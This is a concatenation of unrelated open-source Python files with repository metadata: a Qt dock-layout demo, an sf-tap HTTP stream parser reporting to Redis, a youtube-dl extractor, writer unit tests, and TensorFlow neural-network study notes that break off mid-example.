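# Usage sketch (not part of the original module; the argv handling and the
# option names printed below are only illustrative): once registered on the
# global CONF object, options become typed attributes after oslo.config has
# parsed the command line and any --config-file inputs.
if __name__ == '__main__':
    import sys
    CONF(sys.argv[1:], project='cinder')
    print(CONF.glance_port)         # IntOpt, default 9292
    print(CONF.scheduler_topic)     # StrOpt, default 'cinder-scheduler'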
|
saeki-masaki/cinder
|
cinder/common/config.py
|
Python
|
apache-2.0
| 9,037 | 0 |
import os
import sys
## Make sure pyqtgraph is importable
p = os.path.dirname(os.path.abspath(__file__))
p = os.path.join(p, '..', '..')
sys.path.insert(0, p)
from pyqtgraph.Qt import QtCore, QtGui
from DockArea import *
from Dock import *
app = QtGui.QApplication([])
win = QtGui.QMainWindow()
area = DockArea()
win.setCentralWidget(area)
win.resize(800,800)
from Dock import Dock
d1 = Dock("Dock1", size=(200,200))
d2 = Dock("Dock2", size=(100,100))
d3 = Dock("Dock3", size=(1,1))
d4 = Dock("Dock4", size=(50,50))
d5 = Dock("Dock5", size=(100,100))
d6 = Dock("Dock6", size=(300,300))
area.addDock(d1, 'left')
area.addDock(d2, 'right')
area.addDock(d3, 'bottom')
area.addDock(d4, 'right')
area.addDock(d5, 'left', d1)
area.addDock(d6, 'top', d4)
area.moveDock(d6, 'above', d4)
d3.hideTitleBar()
print "===build complete===="
for d in [d1, d2, d3, d4, d5]:
w = QtGui.QWidget()
l = QtGui.QVBoxLayout()
w.setLayout(l)
btns = []
for i in range(4):
btns.append(QtGui.QPushButton("%s Button %d"%(d.name(), i)))
l.addWidget(btns[-1])
d.w = (w, l, btns)
d.addWidget(w)
import pyqtgraph as pg
p = pg.PlotWidget()
d6.addWidget(p)
print "===widgets added==="
#s = area.saveState()
#print "\n\n-------restore----------\n\n"
#area.restoreState(s)
s = None
def save():
global s
s = area.saveState()
def load():
global s
area.restoreState(s)
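# Usage sketch (assumes an interactive session such as `python -i`): the two
# helpers above snapshot and restore the dock layout at runtime, e.g.
#   save()   # capture the current layout into the global `s`
#   load()   # restore the captured layout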
#d6.container().setCurrentIndex(0)
#d2.label.setTabPos(40)
#win2 = QtGui.QMainWindow()
#area2 = DockArea()
#win2.setCentralWidget(area2)
#win2.resize(800,800)
win.show()
#win2.show()
app.exec_()  # enter the Qt event loop so the windows stay open
|
robertsj/poropy
|
pyqtgraph/dockarea/__main__.py
|
Python
|
mit
| 1,587 | 0.018904 |
import socket
import json
import sys, traceback
import redis
class http_parser:
def __init__(self, sfhttp, is_client = True):
self.__METHOD = 0
self.__RESP = 1
self.__HEADER = 2
self.__BODY = 3
self.__TRAILER = 4
self.__CHUNK_LEN = 5
self.__CHUNK_BODY = 6
self.__CHUNK_END = 7
self._sfhttp = sfhttp
self._is_client = is_client
if is_client:
self._state = self.__METHOD
else:
self._state = self.__RESP
self._data = []
self.result = []
self._ip = ''
self._port = ''
self._peer_ip = ''
self._peer_port = ''
self._method = {}
self._response = {}
self._resp = {}
self._header = {}
self._trailer = {}
self._length = 0
self._remain = 0
self.__is_error = False
def in_data(self, data, header):
if self.__is_error:
return
if self._ip == '' or self._port == '':
if header['from'] == '1':
self._ip = header['ip1']
self._port = header['port1']
self._peer_ip = header['ip2']
self._peer_port = header['port2']
elif header['from'] == '2':
self._ip = header['ip2']
self._port = header['port2']
self._peer_ip = header['ip1']
self._peer_port = header['port1']
self._data.append(data)
try:
self._parse(header)
except Exception:
self.__is_error = True
print('parse error:', file=sys.stderr)
exc_type, exc_value, exc_traceback = sys.exc_info()
print("*** extract_tb:", file=sys.stderr)
print(repr(traceback.extract_tb(exc_traceback)), file=sys.stderr)
print("*** format_tb:", file=sys.stderr)
print(repr(traceback.format_tb(exc_traceback)), file=sys.stderr)
print("*** tb_lineno:", exc_traceback.tb_lineno, file=sys.stderr)
def _push_data(self):
result = {}
if self._is_client:
if self._method == {}:
self.__is_error = True
return
result['method'] = self._method
else:
if self._response == {}:
self.__is_error = True
return
result['response'] = self._response
result['header'] = self._header
result['trailer'] = self._trailer
result['ip'] = self._ip
result['port'] = self._port
self.result.append(result)
self._method = {}
self._response = {}
self._resp = {}
self._header = {}
self._trailer = {}
self._length = 0
self._remain = 0
def _parse(self, header):
while True:
if self._state == self.__METHOD:
if not self._parse_method():
break
elif self._state == self.__RESP:
if not self._parse_response():
break
elif self._state == self.__HEADER:
if not self._parse_header(header):
break
elif self._state == self.__BODY:
self._skip_body()
if self._remain > 0:
break
elif self._state == self.__CHUNK_LEN:
if not self._parse_chunk_len():
break
elif self._state == self.__CHUNK_BODY:
self._skip_body()
if self._remain > 0:
break
self._state = self.__CHUNK_LEN
elif self._state == self.__CHUNK_END:
self._skip_body()
if self._remain > 0:
break
                self._state = self.__TRAILER
            elif self._state == self.__TRAILER:
                if not self._parse_trailer():
                    break
            else:
                break
def _parse_chunk_len(self):
(result, line) = self._read_line()
if result:
self._remain = int(line.split(b';')[0], 16) + 2
self._state = self.__CHUNK_BODY
if self._remain == 2:
self._state = self.__CHUNK_END
return True
else:
return False
def _parse_trailer(self):
(result, line) = self._read_line()
if result:
if len(line) == 0:
if self._is_client:
self._state = self.__METHOD
else:
self._state = self.__RESP
else:
sp = line.split(b': ')
val = (b': '.join(sp[1:])).decode('utf-8')
val = val.strip()
self._trailer[sp[0].decode('utf-8')] = val
return True
else:
return False
def _parse_method(self):
(result, line) = self._read_line()
if result:
sp = line.split(b' ')
self._method['method'] = sp[0].decode('utf-8')
self._method['uri'] = sp[1].decode('utf-8')
self._method['ver'] = sp[2].decode('utf-8')
self._state = self.__HEADER
return True
else:
return False
def _parse_response(self):
(result, line) = self._read_line()
if result:
sp = line.split(b' ')
self._response['ver'] = sp[0].decode('utf-8')
self._response['code'] = sp[1].decode('utf-8')
self._response['msg'] = (b' '.join(sp[2:])).decode('utf-8')
self._state = self.__HEADER
return True
else:
return False
def _parse_header(self, sftap_header):
(result, line) = self._read_line()
if result:
if line == b'':
if 'content-length' in self._header:
self._remain = int(self._header['content-length'])
if self._remain > 0:
self._state = self.__BODY
elif ('transfer-encoding' in self._header and
self._header['transfer-encoding'].lower() == 'chunked'):
self._state = self.__CHUNK_LEN
elif self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
elif ('transfer-encoding' in self._header and
self._header['transfer-encoding'].lower() == 'chunked'):
self._state = self.__CHUNK_LEN
elif self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
else:
sp = line.split(b': ')
val = (b': '.join(sp[1:])).decode('utf-8')
val = val.strip()
ctype = sp[0].decode('utf-8').lower()
if ctype == 'content-type' and val.split('/')[0] == 'video':
self._sfhttp.input_video(val, sftap_header,
self._ip, self._port,
self._peer_ip, self._peer_port)
self._header[sp[0].decode('utf-8').lower()] = val
return True
else:
return False
def _skip_body(self):
while len(self._data) > 0:
num = sum([len(x) for x in self._data[0]])
if num <= self._remain:
self._data.pop(0)
self._remain -= num
if self._remain == 0:
if self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
else:
while True:
num = len(self._data[0][0])
if num <= self._remain:
self._data[0].pop(0)
self._remain -= num
else:
self._data[0][0] = self._data[0][0][self._remain:]
self._remain = 0
if self._remain == 0:
if self._state == self.__BODY:
if self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
return
def _read_line(self):
line = b''
for i, v in enumerate(self._data):
for j, buf in enumerate(v):
idx = buf.find(b'\n')
if idx >= 0:
line += buf[:idx].rstrip()
self._data[i] = v[j:]
suffix = buf[idx + 1:]
if len(suffix) > 0:
self._data[i][0] = suffix
else:
self._data[i].pop(0)
if len(self._data[i]) > 0:
self._data = self._data[i:]
else:
self._data = self._data[i + 1:]
return (True, line)
else:
line += buf
return (False, None)
class sftap_http:
def __init__(self, uxpath):
self._content = []
self._conn = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._conn.connect(uxpath)
print('connected to', uxpath, file=sys.stderr)
self._header = {}
self.__HEADER = 0
self.__DATA = 1
self._state = self.__HEADER
self._http = {}
self._redis = redis.Redis()
def run(self):
while True:
buf = b'' + self._conn.recv(65536)
if len(buf) == 0:
print('remote socket was closed', file=sys.stderr)
return
self._content.append(buf)
self._parse()
def input_video(self, content, header, server_ip, server_port,
client_ip, client_port):
flowid = (header['ip1'],
header['ip2'],
header['port1'],
header['port2'],
header['hop'])
if flowid in self._http:
self._http[flowid][2] = True
msg = 'VOPEN %s %s %s %s' % (client_ip, client_port,
server_ip, server_port)
self._redis.rpush('http', msg)
print(msg)
def _parse(self):
while True:
if self._state == self.__HEADER:
(result, line) = self._read_line()
if result == False:
break
self._header = self._parse_header(line)
if self._header['event'] == 'DATA':
self._state = self.__DATA
elif self._header['event'] == 'CREATED':
flowid = self._get_id()
c = http_parser(self, is_client = True)
s = http_parser(self, is_client = False)
self._http[flowid] = [c, s, False, False]
elif self._header['event'] == 'DESTROYED':
try:
flowid = self._get_id()
c = self._http[flowid][0]
s = self._http[flowid][1]
if self._http[flowid][2] == True:
msg = 'VCLOSE %s %s %s %s' % (c._ip, c._port,
s._ip, s._port)
self._redis.rpush('http', msg)
print(msg)
msg = 'CLOSE %s %s %s %s' % (c._ip, c._port,
s._ip, s._port)
self._redis.rpush('http', msg)
print(msg)
del self._http[flowid]
except KeyError:
pass
elif self._state == self.__DATA:
num = int(self._header['len'])
(result, buf) = self._read_bytes(num)
if result == False:
break
flowid = self._get_id()
if flowid in self._http:
if self._header['match'] == 'up':
# client
c = self._http[flowid][0]
c.in_data(buf, self._header)
if self._http[flowid][3] == False:
msg = 'OPEN %s %s %s %s' % (c._ip, c._port,
c._peer_ip,
c._peer_port)
self._redis.rpush('http', msg)
print(msg)
self._http[flowid][3] = True
elif self._header['match'] == 'down':
# server
self._http[flowid][1].in_data(buf, self._header)
while True:
if (len(self._http[flowid][0].result) > 0 and
len(self._http[flowid][1].result) > 0):
c = self._http[flowid][0].result.pop(0)
s = self._http[flowid][1].result.pop(0)
else:
break
else:
pass
self._state = self.__HEADER
else:
print("ERROR: unkown state", file=sys.stderr)
exit(1)
def _read_line(self):
line = b''
for i, buf in enumerate(self._content):
idx = buf.find(b'\n')
if idx >= 0:
line += buf[:idx]
self._content = self._content[i:]
suffix = buf[idx + 1:]
if len(suffix) > 0:
self._content[0] = suffix
else:
self._content.pop(0)
return (True, line)
else:
line += buf
return (False, b'')
def _read_bytes(self, num):
n = 0
for buf in self._content:
n += len(buf)
if n < num:
return (False, None)
data = []
while True:
buf = self._content.pop(0)
if len(buf) <= num:
data.append(buf)
num -= len(buf)
else:
d = buf[:num]
data.append(d)
self._content.insert(0, buf[num:])
num -= len(d)
if num == 0:
return (True, data)
return (False, None)
def _parse_header(self, line):
d = {}
for x in line.split(b','):
m = x.split(b'=')
d[m[0].decode('utf-8')] = m[1].decode('utf-8')
return d
def _get_id(self):
return (self._header['ip1'],
self._header['ip2'],
self._header['port1'],
self._header['port2'],
self._header['hop'])
def main():
uxpath = '/tmp/sf-tap/tcp/http'
if len(sys.argv) > 1:
uxpath = sys.argv[1]
parser = sftap_http(uxpath)
parser.run()
if __name__ == '__main__':
main()
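# Consumer sketch (not part of the original script): the parser pushes
# "OPEN/CLOSE/VOPEN/VCLOSE <client ip> <client port> <server ip> <server port>"
# strings onto the Redis list 'http' with rpush, so a separate process can
# drain them like this (assumes a Redis instance on localhost):
#
#   import redis
#   r = redis.Redis()
#   while True:
#       _, msg = r.blpop('http')     # blocks until a message arrives
#       print(msg.decode('utf-8'))   # e.g. "OPEN 10.0.0.2 51234 93.184.216.34 80"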
|
7senses/shaka
|
shaka.py
|
Python
|
gpl-2.0
| 15,841 | 0.003283 |
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
js_to_json,
parse_duration,
unescapeHTML,
)
class DRBonanzaIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?dr\.dk/bonanza/[^/]+/\d+/[^/]+/(?P<id>\d+)/(?P<display_id>[^/?#&]+)'
_TEST = {
'url': 'http://www.dr.dk/bonanza/serie/154/matador/40312/matador---0824-komme-fremmede-',
'info_dict': {
'id': '40312',
'display_id': 'matador---0824-komme-fremmede-',
'ext': 'mp4',
'title': 'MATADOR - 08:24. "Komme fremmede".',
'description': 'md5:77b4c1ac4d4c1b9d610ab4395212ff84',
'thumbnail': r're:^https?://.*\.(?:gif|jpg)$',
'duration': 4613,
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id, display_id = mobj.group('id', 'display_id')
webpage = self._download_webpage(url, display_id)
info = self._parse_html5_media_entries(
url, webpage, display_id, m3u8_id='hls',
m3u8_entry_protocol='m3u8_native')[0]
self._sort_formats(info['formats'])
asset = self._parse_json(
self._search_regex(
r'(?s)currentAsset\s*=\s*({.+?})\s*</script', webpage, 'asset'),
display_id, transform_source=js_to_json)
title = unescapeHTML(asset['AssetTitle']).strip()
def extract(field):
return self._search_regex(
r'<div[^>]+>\s*<p>%s:<p>\s*</div>\s*<div[^>]+>\s*<p>([^<]+)</p>' % field,
webpage, field, default=None)
info.update({
'id': asset.get('AssetId') or video_id,
'display_id': display_id,
'title': title,
'description': extract('Programinfo'),
'duration': parse_duration(extract('Tid')),
'thumbnail': asset.get('AssetImageUrl'),
})
return info
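# Sketch (not part of the extractor): _VALID_URL can be exercised directly
# to confirm the named groups, using the URL from _TEST above:
#
#   import re
#   m = re.match(DRBonanzaIE._VALID_URL,
#                'http://www.dr.dk/bonanza/serie/154/matador/40312/matador---0824-komme-fremmede-')
#   assert m.group('id') == '40312'
#   assert m.group('display_id') == 'matador---0824-komme-fremmede-'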
|
valmynd/MediaFetcher
|
src/plugins/youtube_dl/youtube_dl/extractor/drbonanza.py
|
Python
|
gpl-3.0
| 1,678 | 0.026222 |
from nose.tools import assert_equal, assert_raises
import mock
import xmlrpc.client
from src.writers import FileWriter, LavaWriter
from src.writers import UnavailableError
class TestFileWriter(object):
OUTPUT_DIR = 'foo'
CONTENT = 'test'
NAME = 'test-job-name'
def test_fail_open(self):
cfg = {
'output_dir': self.OUTPUT_DIR,
}
mo = mock.mock_open()
with mock.patch('builtins.open', mo, create=True) as mocked:
mocked.side_effect = IOError
writer = FileWriter(cfg)
assert_raises(UnavailableError, writer.write, dict(),
self.NAME, self.CONTENT)
def test_write(self):
cfg = {
'output_dir': self.OUTPUT_DIR,
}
mo = mock.mock_open(read_data=self.CONTENT)
with mock.patch('builtins.open', mo, create=True) as mocked:
path = '%s/%s.yaml' % (self.OUTPUT_DIR, self.NAME)
mocked_file = mocked.return_value
writer = FileWriter(cfg)
results = writer.write(dict(), self.NAME, self.CONTENT)
mocked.assert_called_once_with(path, 'w')
mocked_file.write.assert_called_with(self.CONTENT)
assert_equal(results, [path])
class TestLavaWriter(object):
DEVICE_TYPE = 'foo_bar'
CONTENT = 'test'
NAME = 'test-job-name'
UI_ADDRESS = 'http://webui.example.org'
@mock.patch('xmlrpc.client.ServerProxy')
def test_connection_error(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
}
response = {
'status': 'offline',
}
mock.side_effect = xmlrpc.client.Error
assert_raises(UnavailableError, LavaWriter, cfg)
@mock.patch('xmlrpc.client.ServerProxy')
def test_device_offline(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
}
response = {
'status': 'offline',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.get_device_status.return_value = response
writer = LavaWriter(cfg)
assert_raises(UnavailableError, writer.write, board,
self.NAME, self.CONTENT)
@mock.patch('xmlrpc.client.ServerProxy')
def test_write_unique(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
'web_ui_address': self.UI_ADDRESS,
}
response = {
'status': 'online',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.submit_job.return_value = 42
writer = LavaWriter(cfg)
results = writer.write(board, self.NAME, self.CONTENT)
mock_proxy.scheduler.get_device_status.assert_called_with('%s_01' % self.DEVICE_TYPE)
mock_proxy.scheduler.submit_job.assert_called_with(self.CONTENT)
assert_equal(results, ['%s/scheduler/job/%d' % (self.UI_ADDRESS, 42)])
@mock.patch('xmlrpc.client.ServerProxy')
def test_write_multiple(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
'web_ui_address': self.UI_ADDRESS,
}
response = {
'status': 'online',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.submit_job.return_value = (42, 84)
writer = LavaWriter(cfg)
results = writer.write(board, self.NAME, self.CONTENT)
mock_proxy.scheduler.get_device_status.assert_called_with('%s_01' % self.DEVICE_TYPE)
mock_proxy.scheduler.submit_job.assert_called_with(self.CONTENT)
assert_equal(results, ['%s/scheduler/job/%d' % (self.UI_ADDRESS, 42),
'%s/scheduler/job/%d' % (self.UI_ADDRESS, 84)])
|
free-electrons/custom_tests_tool
|
tests/test_writers.py
|
Python
|
gpl-2.0
| 4,332 | 0.000462 |
##### TensorFlow deep learning - chapter 1
import tensorflow as tf
hello = tf.constant('Hello, Tensorflow')
sess = tf.Session()
print(sess.run(hello))
# the 'b' prefix in the printed output marks a bytes literal
node1 = tf.constant(3.0, tf.float32) # value, dtype
node2 = tf.constant(4.0) # dtype inferred as float32
node3 = tf.add(node1, node2) # graph node for the sum
# node3 = node1 + node2 # the operator form also works
print(node1)
print(node2)
print(node3)
sess = tf.Session()
print('sess.run(node1, node2):', sess.run([node1, node2]))
print('sess.run(node3):', sess.run(node3))
# Use a placeholder to build the graph ahead of time and feed in the values
# only at the execution step.
a = tf.placeholder(tf.float32)
b = tf.placeholder(tf.float32)
adder_node = a + b
print(sess.run(adder_node, feed_dict={a:3, b:4.5}))
print(sess.run(adder_node, feed_dict={a:[1,3], b:[2,4]}))
# A tensor is an array.
# rank of an array:
# 0:scalar // 1:vector // 2:matrix // n:n-tensor.....
# shape of a tensor:
# the form reported by .shape
# dtype:
# int32 // float32
# Summary:
# 1. design and build the graph
# 2. run the graph (sess.run, feeding values)
# 3. get the results back
#### TensorFlow deep learning - chapter 4: reading data from a file
import numpy as np
import tensorflow as tf
xy = np.loadtxt('C:\python\DeepLearningPythonStudy\DeepLearning\DeepLearning\\02_Deep_ChoTH\data\data-01-test-score.csv', delimiter=',', dtype=np.float32)
x_data = xy[:, 0:-1]
y_data = xy[:, [-1]]
print(x_data.shape, x_data, len(x_data))
print(y_data.shape, y_data)
# Reference:
# b = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
# b[:, 1]   # column 1 of every row
# b[-1]     # last row
# b[-1, :]  # the whole last row
# b[0:2, :] # all columns of the first two rows
# how many dimensions does the array have? -> rank
# what form does the array have? -> shape
# axis
sess = tf.InteractiveSession()
t = tf.constant([1,2,3,4])
tf.shape(t).eval()
t = tf.constant([[1,2],
[3,4]])
tf.shape(t).eval()
t = tf.constant([[[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]])
tf.shape(t).eval()
m1 = tf.constant([[1.,2.]])
m2 = tf.constant(3.)
tf.shape(m1+m2).eval()
tf.reduce_mean([1.,2.], axis=0).eval() # must be float, not integer!
x = [[1.,2.],
[3.,4.]]
tf.reduce_mean(x).eval()
tf.reduce_mean(x, axis=1).eval()
tf.reduce_mean(x, axis=0).eval() # axis 0 is the outermost axis
tf.reduce_mean(x, axis=-1).eval() # axis -1 is the innermost axis
tf.reduce_sum(x).eval()
tf.reduce_sum(x, 1).eval()
tf.reduce_sum(x, 0).eval()
tf.reduce_sum(x, -1).eval() # innermost axis
x = [[0,1,2],
[2,1,0]]
tf.argmax(x).eval() # index of the largest value; axis defaults to 0 when omitted
tf.argmax(x, 1).eval()
tf.argmax(x, 0).eval()
tf.argmax(x, -1).eval()
t = np.array([[[0, 1, 2],
[3, 4, 5]],
[[6, 7, 8],
[9, 10, 11]]])
t.shape
tf.reshape(t, shape=[-1,3]).eval() # innermost dim 3, infer the rest (-1): a 2-D result
tf.reshape(t, shape=[-1,1,3]).eval() # innermost 3, then 1, infer the rest (-1): a 3-D result
tf.squeeze([[0], [1], [2]]).eval() # remove size-1 dimensions
tf.expand_dims([0,1,2], 1).eval() # add a dimension
# one hot
tf.one_hot([[0], [1], [2], [0]], depth=3).eval() # one_hot adds a rank automatically
t = tf.one_hot([[0], [1], [2], [0]], depth=3) # reshape below undoes the automatically added rank
tf.reshape(t, shape=[-1, 3]).eval()
tf.cast([1.8, 2.2, 3.3, 4.9], tf.int32).eval()
tf.cast([True, False, 1 == 1, 0 == 1], tf.int32).eval()
x = [1, 4]
y = [2, 5]
z = [3, 6]
# Pack along first dim.
tf.stack([x, y, z]).eval()
tf.stack([x, y, z], axis=0).eval()
tf.stack([x, y, z], axis=1).eval()
x = [[0, 1, 2],
[2, 1, 0]]
tf.ones_like(x).eval()
tf.zeros_like(x).eval()
for x, y in zip([1,2,3], [4,5,6]):
print(x, y)
for x, y, z in zip([1,2,3], [4,5,6], [7,8,9]):
print(x, y, z)
# K = tf.sigmoid(tf.matmul(X, W1) + b1)
# hypothesis = tf.sigmoid(tf.matmul(K, W2) + b2)
# ML lab 09-1: Neural Net for XOR
# XOR neural network code
import numpy as np
import tensorflow as tf
x_data = np.array([[0,0], [0,1], [1,0], [1,1]], dtype=np.float32)
y_data = np.array([[0], [1], [1], [0]], dtype=np.float32)
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W = tf.Variable(tf.random_normal([2,1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
# softmax is omitted because the data set is tiny; sigmoid is enough here
hypothesis = tf.sigmoid(tf.matmul(X,W) + b)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y) * tf.log(1-hypothesis)) # cross-entropy loss
train = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # minimize the loss with gradient descent
# Accuracy computation
# True is hypothesis>0.5 else False
predicted = tf.cast(hypothesis>0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Launch graph
sess = tf.Session()
# Initialize TensorFlow variables
sess.run(tf.global_variables_initializer())
for step in range(1001):
sess.run(train, feed_dict={X:x_data, Y:y_data})
if step%100 == 0:
print(step, sess.run(cost, feed_dict={X:x_data, Y:y_data}))
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy], feed_dict={X:x_data, Y:y_data})
print("\nHypothesis:", h, "\nCorrect:", c, "\nAccuracy:", a)
# No error, but the loss does not decrease: a single layer is too simple for XOR.
# accuracy : [0.50208956]
# A 2-layer network similar to the one above
import numpy as np
import tensorflow as tf
x_data = np.array([[0,0], [0,1], [1,0], [1,1]], dtype=np.float32)
y_data = np.array([[0], [1], [1], [0]], dtype=np.float32)
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W1 = tf.Variable(tf.random_normal([2,2]), name='weight1') # first 2 = number of inputs, second 2 = number of nodes (outputs)
b1 = tf.Variable(tf.random_normal([2]), name='bias1') # the bias size must match the number of outputs
layer1 = tf.sigmoid(tf.matmul(X,W1) + b1)
# layer1 = tf.nn.relu(tf.matmul(X,W1) + b1)
W2 = tf.Variable(tf.random_normal([2,1]), name='weight2')
b2 = tf.Variable(tf.random_normal([1]), name='bias2')
hypothesis = tf.sigmoid(tf.matmul(layer1,W2) + b2)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y) * tf.log(1-hypothesis)) # cross-entropy loss
train = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # minimize the loss with gradient descent
# Accuracy computation
# True is hypothesis>0.5 else False
predicted = tf.cast(hypothesis>0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Launch graph
sess = tf.Session()
# Initialize TensorFlow variables
sess.run(tf.global_variables_initializer())
for step in range(1001):
sess.run(train, feed_dict={X:x_data, Y:y_data})
if step%100 == 0:
print(step, sess.run(cost, feed_dict={X:x_data, Y:y_data}))
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy], feed_dict={X:x_data, Y:y_data})
print("\nHypothesis:", h, "\nCorrect:", c, "\nAccuracy:", a)
# Accuracy: 0.75
# More layers do not automatically mean higher accuracy.
# During backpropagation the sigmoid keeps multiplying in factors smaller than 1,
# so the propagated signal keeps shrinking; the closer to the input, the smaller
# the influence and the gradient vanishes (the vanishing gradient problem).
# Hence ReLU is used in the hidden layers, and only the last layer uses sigmoid,
# because the output has to lie between 0 and 1.
# Notes on weight initialization:
# 1. Never initialize with 0.
# 2. RBM pretraining is hard, so use Xavier or He initialization instead.
# W = np.random.randn(fan_in, fan_out) / np.sqrt(fan_in)     # Xavier
# W = np.random.randn(fan_in, fan_out) / np.sqrt(fan_in / 2) # He
# Except for CNNs, use Xavier, ReLU, dropout, and Adam.
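# A short runnable check of the two initializers above (my own illustration,
# not from the lecture): Xavier scales by 1/sqrt(fan_in), He by sqrt(2/fan_in),
# which keeps the spread of the pre-activations roughly constant per layer.
fan_in, fan_out = 784, 256
W_xavier = np.random.randn(fan_in, fan_out) / np.sqrt(fan_in)
W_he = np.random.randn(fan_in, fan_out) / np.sqrt(fan_in / 2)
x_init = np.random.randn(100, fan_in)
print((x_init @ W_xavier).std())  # ~1.0
print((x_init @ W_he).std())      # ~1.41 (= sqrt(2))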
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
nb_classes = 10
keep_prob = tf.placeholder(tf.float32)
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, nb_classes])
###################################################
W1 = tf.get_variable("W1", shape=[784, 256], initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.Variable(tf.random_normal([256]))
layer1 = tf.nn.relu(tf.matmul(X, W1) + b1)
layer1 = tf.nn.dropout(layer1, keep_prob=keep_prob)
W2 = tf.get_variable("W2", shape=[256, 128], initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.Variable(tf.random_normal([128]))
layer2 = tf.nn.relu(tf.matmul(layer1, W2) + b2)
layer2 = tf.nn.dropout(layer2, keep_prob=keep_prob)
W3 = tf.get_variable("W3", shape=[128, nb_classes], initializer=tf.contrib.layers.xavier_initializer())
b3 = tf.Variable(tf.random_normal([nb_classes]))
hypothesis = tf.matmul(layer2, W3) + b3
###################################################
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
# Test model
is_correct = tf.equal(tf.arg_max(hypothesis, 1), tf.arg_max(Y, 1))
accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))
training_epochs = 15
batch_size = 100
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for epoch in range(training_epochs):
avg_cost = 0
    total_batch = int(mnist.train.num_examples / batch_size) # number of batches per epoch
for i in range(total_batch):
batch_xs, batch_ys = mnist.train.next_batch(batch_size)
feed_dict = {X: batch_xs, Y: batch_ys, keep_prob:0.7}
c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
avg_cost += c / total_batch
print('Epoch:', '%04d' % (epoch +1), 'cost=', '{:.9f}'.format(avg_cost))
print("Accuracy:", accuracy.eval(session=sess, feed_dict={X:mnist.test.images, Y:mnist.test.labels, keep_prob:1}))
#### CNN practice
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
sess = tf.InteractiveSession()
image = np.array([[[[1],[2],[3]],
[[4],[5],[6]],
[[7],[8],[9]]]], dtype=np.float32)
print(image.shape)
plt.imshow(image.reshape(3,3), cmap='Greys')
plt.show()
##########################
### 2-layer CNN hands-on (MNIST)
##########################
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
import random
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
learning_rate = 0.001
training_epochs = 15
batch_size = 100
nb_classes = 10
X = tf.placeholder(tf.float32, [None, 784])
X_img = tf.reshape(X, [-1, 28, 28, 1]) # img 28x28x1 (black/white)
Y = tf.placeholder(tf.float32, [None, nb_classes])
# L1 ImgIn shape=(?, 28, 28, 1)
W1 = tf.Variable(tf.random_normal([3,3,1,32], stddev=0.01)) # filter height/width, input channels, number of filters
# W1 = tf.get_variable("W1", shape=[3,3,1,32], initializer=tf.contrib.layers.xavier_initializer())???
# after conv -> (?, 28, 28, 32)
# after pool -> (?, 14, 14, 32)
L1 = tf.nn.conv2d(X_img, W1, strides=[1,1,1,1], padding='SAME')
print(L1)
L1 = tf.nn.relu(L1)
L1 = tf.nn.max_pool(L1, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME') # max pooling with stride 2
'''
Tensor("Conv2D:0", shape=(?, 28, 28, 32), dtype=float32)
Tensor("Relu:0", shape=(?, 28, 28, 32), dtype=float32)
Tensor("MaxPool:0", shape=(?, 14, 14, 32), dtype=float32) # 1층에서 출력값!!!!!의 형태
'''
# L2 ImgIn shape=(?, 14, 14, 32)
W2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev=0.01)) # filter size, filter depth (matches the 32 channels from L1), number of filters (64 feature maps out)
# Conv ->(?, 14, 14, 64)
# Pool ->(?, 7, 7, 64)
L2 = tf.nn.conv2d(L1, W2, strides=[1, 1, 1, 1], padding='SAME')
L2 = tf.nn.relu(L2)
